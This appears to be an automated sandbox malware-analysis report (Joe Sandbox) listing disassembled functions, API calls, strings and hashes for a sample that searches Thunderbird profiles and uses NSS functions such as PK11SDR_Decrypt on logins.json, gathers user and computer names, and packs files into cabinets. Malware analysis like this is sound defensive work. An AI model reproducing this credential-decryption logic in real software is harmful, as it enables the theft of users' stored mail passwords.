Part of subcall function 001D8FF6: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D902C
Part of subcall function 001D8FF6: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 001D904C
Part of subcall function 001D8FF6: lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 001D905F
Part of subcall function 001D8FF6: SetCurrentDirectoryW.KERNEL32(?,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D906B
Part of subcall function 001D8FF6: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D906E
Part of subcall function 001D8FF6: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D907A
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 001D908C
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 001D909B
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 001D90AA
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 001D90B9
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 001D90C8
Part of subcall function 001D8FF6: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 001D90D7

FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D9FA6
lstrlenW.KERNEL32(?), ref: 001D9FC2
lstrlenW.KERNEL32(?), ref: 001D9FDA

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

lstrcpyW.KERNEL32(00000000,?), ref: 001D9FF3
lstrcpyW.KERNEL32(00000002), ref: 001DA008

Part of subcall function 001C7AEA: lstrlenW.KERNEL32(?), ref: 001C7AFA
Part of subcall function 001C7AEA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 001C7B1C
Part of subcall function 001C7AEA: lstrcpyW.KERNEL32(00000000,?), ref: 001C7B48
Part of subcall function 001C7AEA: lstrcatW.KERNEL32(00000000,\logins.json), ref: 001C7B54

FindNextFileW.KERNEL32(?,00000010), ref: 001DA030
FindClose.KERNEL32(00000002), ref: 001DA03E

Strings

%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default, xrefs: 001D9F6A
%PROGRAMFILES%\Mozilla Thunderbird, xrefs: 001D9F46

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID: %PROGRAMFILES%\Mozilla Thunderbird$%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
API String ID: 1209511739-2644807129
Opcode ID: 537c0f64e154d5b204fda5cc18184455005a3fb84c9a7c14c3492c537e6d7a61
Instruction ID: 5e157f3df9ae88bfc7c16b4b2c5a58bde9ff1fc4cfc7f391d59c06a53ab8f39c
Opcode Fuzzy Hash: 537c0f64e154d5b204fda5cc18184455005a3fb84c9a7c14c3492c537e6d7a61
Instruction Fuzzy Hash: B2316F714083429BD721DF64DC85A2FBBE9FF94B44F04492EF594A2290DB74CA44CBA3

Uniqueness

Uniqueness Score: 100.00%

Function 001C109B, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,00000000,00000000,001C5179,00000000,77A4F5B0,001C17F8,61636F4C,00000001,?,?,?,00000000), ref: 001C10B4
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C10C2
LoadLibraryA.KERNEL32(xul.dll,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C10D7
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 001C10E5
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 001C10F2

Strings

PR_GetError, xrefs: 001C10DF
NSPR4.DLL, xrefs: 001C10A4, 001C10A9
NSS3.DLL, xrefs: 001C10BC, 001C10C1
xul.dll, xrefs: 001C10D2
PR_SetError, xrefs: 001C10E7

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: e4a21fbb1ae47bf645b2bb80e489f316200c1562f357e97b048807d574fc790e
Instruction ID: 7008b200f34af4efe4dcc0d554ee66023f606eb034359232b543a2647960b45e
Opcode Fuzzy Hash: e4a21fbb1ae47bf645b2bb80e489f316200c1562f357e97b048807d574fc790e
Instruction Fuzzy Hash: 9B218471A81A909BC711DFEAECC1F0D77E6E769B94B84002AF508DFB61D7B488808B54

Uniqueness

Uniqueness Score: 100.00%

Function 001C9A1F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90memoryUNIQUE

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 001C9A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C9A5C
GetUserNameW.ADVAPI32(00000000,?), ref: 001C9A6E
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,001C5CF7), ref: 001C9A8D
GetComputerNameW.KERNEL32(00000000,?), ref: 001C9A9B
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C9AB2
GetComputerNameW.KERNEL32(00000000,?), ref: 001C9AC3
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,001C5CF7), ref: 001C9AE4

Strings

Client, xrefs: 001C9A30

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Client
API String ID: 3239747167-3236430179
Opcode ID: 876afffedd0baa9ecb89889ac2c32eb7436c666f04ceb429660270589dca044e
Instruction ID: 870ea19e69f4678977f2b3d761d56f01557ec36c31e8d88cf269084808dd0165
Opcode Fuzzy Hash: 876afffedd0baa9ecb89889ac2c32eb7436c666f04ceb429660270589dca044e
Instruction Fuzzy Hash: 0031F4B2900249EFDB10DFA4DCC5DAEBBFAEB54304B148469E501D7660D730DE81DB20

Uniqueness

Uniqueness Score: 100.00%

Function 001D5A05, Relevance: 10.6, APIs: 7, Instructions: 109filestringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,001C8F8A,00000000), ref: 001D5A1D

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

FindFirstFileW.KERNEL32(?,00000000), ref: 001D5A86
lstrlenW.KERNEL32(0000002C), ref: 001D5AAE
RemoveDirectoryW.KERNEL32(?), ref: 001D5B00
DeleteFileW.KERNEL32(?), ref: 001D5B0B
FindNextFileW.KERNEL32(00000000,00000000), ref: 001D5B1E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 41e7aed8ab7f5fb76f6808d9f6cf9b8685c7121c1451be2a98737a387bf1cd4f
Instruction ID: affe80f57aefa4b8ef0b011d9081a8eaa2cbf12f857f32592dcb2943e9e318d7
Opcode Fuzzy Hash: 41e7aed8ab7f5fb76f6808d9f6cf9b8685c7121c1451be2a98737a387bf1cd4f
Instruction Fuzzy Hash: 95415E71900649EFDF119FA4DC85EAEBBBAFF10305F1041A7F910AA261D7708B80EB61

Uniqueness

Uniqueness Score: 100.00%

Function 001C9044, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeUNIQUE

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,?,00000000,00000000,?), ref: 001C9093
lstrlenW.KERNEL32(?), ref: 001C90A1
NtQueryKey.NTDLL(?,?,00000000,?,?), ref: 001C90CC
lstrcpyW.KERNEL32(00000006,00000000), ref: 001C90F9

Strings

SOFTWARE\Classes\Chrome, xrefs: 001C9110
DelegateExecute, xrefs: 001C906B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 2b5ddbed246b9d9910a02d3fe1bf330a080aa647968a631403ae5d7d8df4b16a
Instruction ID: 7df07bdccdc396019b82ef84eea0b3e3a019050c1d2a407492eceed9d4368b6a
Opcode Fuzzy Hash: 2b5ddbed246b9d9910a02d3fe1bf330a080aa647968a631403ae5d7d8df4b16a
Instruction Fuzzy Hash: 5B314A71A0024AFFDF118FA8CD8AE9EBBB9FF24324F144069F901A6160D771DA51DB50

Uniqueness

Uniqueness Score: 100.00%

Function 001DA6DC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101UNIQUE

Download Yara Rule

APIs

memset.NTDLL ref: 001DA6FE

Part of subcall function 001CFE1C: NtAllocateVirtualMemory.NTDLL(001DA726,00000000,00000000,001DA726,00003000,00000040), ref: 001CFE4D
Part of subcall function 001CFE1C: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CFE54
Part of subcall function 001CFE1C: SetLastError.KERNEL32(00000000), ref: 001CFE5B

GetLastError.KERNEL32(?,00000318,00000008), ref: 001DA80E

Part of subcall function 001CD086: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CD09E

memcpy.NTDLL(00000218,001E0F90,00000100,?,00010003,?,?,00000318,00000008), ref: 001DA78D
RtlNtStatusToDosError.NTDLL(00000000), ref: 001DA7E7

Strings

, xrefs: 001DA754

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
String ID:
API String ID: 2966525677-3916222277
Opcode ID: 3283f2c7c75d479988ecefb503155e595d6d763fb39213b776353d900ad84d19
Instruction ID: f00b01b1d98fa7979caf715e0144334d56c6792eb004c151b6435d6fdcd0fd58
Opcode Fuzzy Hash: 3283f2c7c75d479988ecefb503155e595d6d763fb39213b776353d900ad84d19
Instruction Fuzzy Hash: 2C318E71900209AFDB20DFA4D985AAEB7B8EF24344F50457EE905E7250EB30EE85DB51

Uniqueness

Uniqueness Score: 23.02%

Function 001CA4B9, Relevance: 6.0, APIs: 4, Instructions: 45pipeUNIQUE

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001E6114,00000001), ref: 001CA4DD
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CA528

Part of subcall function 001D98EF: CreateThread.KERNELBASE(00000000,00000000,00000000,001DDB80,00000000,001D9AB2), ref: 001D9906
Part of subcall function 001D98EF: QueueUserAPC.KERNELBASE(001DDB80,00000000,001D2FB5,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D991B
Part of subcall function 001D98EF: GetLastError.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9926
Part of subcall function 001D98EF: TerminateThread.KERNEL32(00000000,00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9930
Part of subcall function 001D98EF: CloseHandle.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9937
Part of subcall function 001D98EF: SetLastError.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9940

GetLastError.KERNEL32(Function_00002587,00000000,00000000,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CA510
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CA520

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: d227c62c784c589b9f1f088ed3e03140d4f1383f4699a8ffe9787f4268b1e980
Instruction ID: 00b6f7f42a9270a64905df7117d5acc1b812981aab5c64c625df83635800c7b5
Opcode Fuzzy Hash: d227c62c784c589b9f1f088ed3e03140d4f1383f4699a8ffe9787f4268b1e980
Instruction Fuzzy Hash: 3AF0D1703412506FE3295BA8AC89E6F269CDB95374B500139F615C62D0DB708C4A8671

Uniqueness

Uniqueness Score: 100.00%

Function 00401210, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401210() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x4040f0; // 0x400000
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4040fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x4040ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4040e8 = _t5;
						 *0x4040f0 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4040e4 = _t6;
						if(_t6 == 0) {
							 *0x4040e4 =  *0x4040e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401211
0x0040121f
0x00401227
0x0040122c
0x0040127e
0x0040127e
0x0040122e
0x00401236
0x0040123e
0x0040123e
0x0040127a
0x0040127c
0x00000000
0x00000000
0x00000000
0x00401238
0x0040123a
0x00401240
0x00401240
0x00401245
0x00401253
0x00401258
0x0040125e
0x00401266
0x0040126b
0x0040126d
0x0040126d
0x00401277
0x0040123c
0x0040123c
0x00000000
0x0040123c
0x0040123a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401B91), ref: 0040121F
GetVersion.KERNEL32 ref: 0040122E
GetCurrentProcessId.KERNEL32 ref: 00401245
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040125E

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: c45028908868135c920cc97afa568fa459751fd2a0e219e586fb5e7ffe0a0f23
Instruction ID: dafdb1b34e00ad9d256d006c4bba74d1fdbd3786c974829d5f80bd7cfad2a097
Opcode Fuzzy Hash: c45028908868135c920cc97afa568fa459751fd2a0e219e586fb5e7ffe0a0f23
Instruction Fuzzy Hash: A0F0C2B06812009BEB20EF69BE09B863F68A745B12F00817AE305F62F4D3744A418B2C

Uniqueness

Uniqueness Score: 0.16%

Function 001C84A9, Relevance: 3.1, APIs: 2, Instructions: 56libraryloaderUNIQUE

Download Yara Rule

APIs

memset.NTDLL ref: 001C84BD
GetProcAddress.KERNEL32(6F57775A), ref: 001C84E5

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProcmemset
String ID:
API String ID: 4219566340-0
Opcode ID: 02d55eb64d0bfddab64b382d49f838ce255137a13984a514b3658c478f5a23f1
Instruction ID: 444d68b6ac7714a36c4a7701b8b9db8cdc2b97b22e2b92bbb8c4eeaa2c69d397
Opcode Fuzzy Hash: 02d55eb64d0bfddab64b382d49f838ce255137a13984a514b3658c478f5a23f1
Instruction Fuzzy Hash: 90115A31A00259AFDB00DB98DC89FAD7BA8AB65B50F45402DF904EB291EB70E905CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001C6AFC, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001C6B2D
RtlNtStatusToDosError.NTDLL(C000009A), ref: 001C6B64

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: a192712a9fc6d8720b6ab428bf01d0a7d92df7c0c8fb1b138805b0b4f0001ea8
Instruction ID: 707a330ec2873fe0ec31343446d3486968308fe85828453a6b58d3370a5117b8
Opcode Fuzzy Hash: a192712a9fc6d8720b6ab428bf01d0a7d92df7c0c8fb1b138805b0b4f0001ea8
Instruction Fuzzy Hash: 7901D673B02124ABCB265B548D48FAFBA2C9F61B50F16011CFD01E7110D770CE40D6E1

Uniqueness

Uniqueness Score: 0.14%

Function 001D180E, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001D182D
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 001D1845

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: 590bf8a2b25f2ee0a815ab904946262a1510cf93d91744b10c030878b33b4fb8
Instruction ID: 120129fbfe8b62171509af0eae56ee9c86b41627603c4ed67c5587019e3698b1
Opcode Fuzzy Hash: 590bf8a2b25f2ee0a815ab904946262a1510cf93d91744b10c030878b33b4fb8
Instruction Fuzzy Hash: C2F012B690426CBAEF20DA91CC49FDE7B7CAB14740F004065FE18E6191E770DB54DBA0

Uniqueness

Uniqueness Score: 0.22%

Function 001C2A12, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 001C2A3F
SetLastError.KERNEL32(00000000), ref: 001C2A46

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 817d24bd0074857438c74a38cd3f5ef72430b685deeb8a2ed55d401dcfb7cbc8
Instruction ID: f54d33188b85f88a54c31d74eca08fca80d1abda8908395d8c4605859faa2210
Opcode Fuzzy Hash: 817d24bd0074857438c74a38cd3f5ef72430b685deeb8a2ed55d401dcfb7cbc8
Instruction Fuzzy Hash: 97E09A3620425AABCF125FE49C44E9A7B6EBF28B51B004424FB05D6521C771D9A1ABA0

Uniqueness

Uniqueness Score: 0.21%

Function 001CE5F5, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 001CEC8C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8db87be53efe2e0f6d767ebece19d34d5f2ea2aad67c7ba1afa4c9c972375277
Instruction ID: d0715599faae8d9b0305fe3565a78974f92a66a1add73d825e47b723d564b19d
Opcode Fuzzy Hash: 8db87be53efe2e0f6d767ebece19d34d5f2ea2aad67c7ba1afa4c9c972375277
Instruction Fuzzy Hash: 1722947BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: 0.00%

Function 001DE843, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001DE8B3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 19ac4b8a52f57cf6f8ca15208514b7846a5a4e944b85a2399e26bcd2fb387410
Instruction ID: 4946df6c3da89f03f0b8cba604196d505559e21068e6f716025a7e9a90cfc3a2
Opcode Fuzzy Hash: 19ac4b8a52f57cf6f8ca15208514b7846a5a4e944b85a2399e26bcd2fb387410
Instruction Fuzzy Hash: 79119D32100249BFDF02AF98DD40DDE7BA6FF58369B454225FE1966260C732D8B1AB90

Uniqueness

Uniqueness Score: 0.04%

Function 001DD470, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,779F5520,00000018,00000000,001E6340), ref: 001DD487

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 07c368d76c48acf2955593ab5bf568bed3bca33a0087ace1a01c31be43d0dd3e
Instruction ID: 30b280d6a3c5fd73f323ed7e60dd9b26331c4002e5cf59d90e50e5add4dc77dd
Opcode Fuzzy Hash: 07c368d76c48acf2955593ab5bf568bed3bca33a0087ace1a01c31be43d0dd3e
Instruction Fuzzy Hash: F2F058313001299F8B20DFA9EC84DABBBA8EB21794B524116E901DBB60D730FD45CBE0

Uniqueness

Uniqueness Score: 0.01%

Function 001CD086, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 001CD09E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: ee182c25843d17540deb6df35db8a97168b1fa69f0a8c24901f8b6067b7e7636
Instruction ID: 6b0fdeb981fb9f076c50ef667fd777d177fcc081a87e095130c4d2d7b35b6af6
Opcode Fuzzy Hash: ee182c25843d17540deb6df35db8a97168b1fa69f0a8c24901f8b6067b7e7636
Instruction Fuzzy Hash: BFC012325042026FDF185B60DC59E2E7A26BF50340F10442CF14989070D770D891C711

Uniqueness

Uniqueness Score: 0.28%

Function 00417B3E, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4275329fb080be14f1ad34947232973e25463491a4fddd9acde6a45dbdf4cdad
Instruction ID: e2aefb963752033ade476212f9033422603c4d5bf9963bda4be8d8ad6286bdad
Opcode Fuzzy Hash: 4275329fb080be14f1ad34947232973e25463491a4fddd9acde6a45dbdf4cdad
Instruction Fuzzy Hash: 6DB1DD31E2AF418DD2239639C931336B65CAFBB2D5F52D72BFC2674D22EB2285874144

Uniqueness

Uniqueness Score: 0.00%

Function 001E14A8, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 5d190be64335d057a8b76ed9ec98c59dff3ae9f2a59addb1d95ee388bd2c5b95
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 5121D672900644EBCB14EF6AC8819AFB7A5FF89350B0985A8E9178B245D730F915CBE0

Uniqueness

Uniqueness Score: 0.00%

Function 001C2F37, Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 218filememoryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00001000), ref: 001C2F55
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C2F78
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001C2F90
wsprintfA.USER32 ref: 001C2FB6
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C2FC7
wsprintfA.USER32 ref: 001C2FE5
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C2FF6
GetFileAttributesA.KERNEL32(00000008), ref: 001C2FFB
wsprintfA.USER32 ref: 001C3010
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C3021
GetLastError.KERNEL32 ref: 001C302F
CloseHandle.KERNEL32(?), ref: 001C319D
GetLastError.KERNEL32 ref: 001C31A5
HeapFree.KERNEL32(00000000,?), ref: 001C31B8

Strings

"%s", xrefs: 001C3008
"%S", xrefs: 001C3136
.set MaxDiskSize=0.set DiskDirectory1="%s", xrefs: 001C2FAE
.set DestinationDir="%S", xrefs: 001C30FF, 001C3118
.set CabinetName1="%s", xrefs: 001C2FDD
*.*, xrefs: 001C308E

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$Writewsprintf$ErrorHeapLast$AllocateAttributesCloseCreateFreeHandle
String ID: "%S"$"%s"$*.*$.set CabinetName1="%s"$.set DestinationDir="%S"$.set MaxDiskSize=0.set DiskDirectory1="%s"
API String ID: 3254920416-2937155979
Opcode ID: bbca6ebfbdbbf6b231885cd64a109bef5363828cd20cadb3e6bc1f3f45c46055
Instruction ID: 6a30f43e110d71a4b91559e72e60b491f70304c3885df6ef15c91edeb763169b
Opcode Fuzzy Hash: bbca6ebfbdbbf6b231885cd64a109bef5363828cd20cadb3e6bc1f3f45c46055
Instruction Fuzzy Hash: 158124B0900249BFDF059FA4DC94EAE7FB9FF04344F008429F915AA2A1DB719A95DF60

Uniqueness

Uniqueness Score: 100.00%

Function 001D1E77, Relevance: 51.4, APIs: 34, Instructions: 402synchronizationtimethreadUNIQUE

Download Yara Rule

APIs

Part of subcall function 001CA17E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CA1B2
Part of subcall function 001CA17E: GetLastError.KERNEL32 ref: 001CA273
Part of subcall function 001CA17E: ReleaseMutex.KERNEL32(00000000), ref: 001CA27C

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D1F15

Part of subcall function 001C9D5C: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C9D76
Part of subcall function 001C9D5C: CreateWaitableTimerA.KERNEL32(001E6114,?,?), ref: 001C9D93
Part of subcall function 001C9D5C: GetLastError.KERNEL32(?,?), ref: 001C9DA4
Part of subcall function 001C9D5C: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 001C9DE4
Part of subcall function 001C9D5C: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 001C9E03
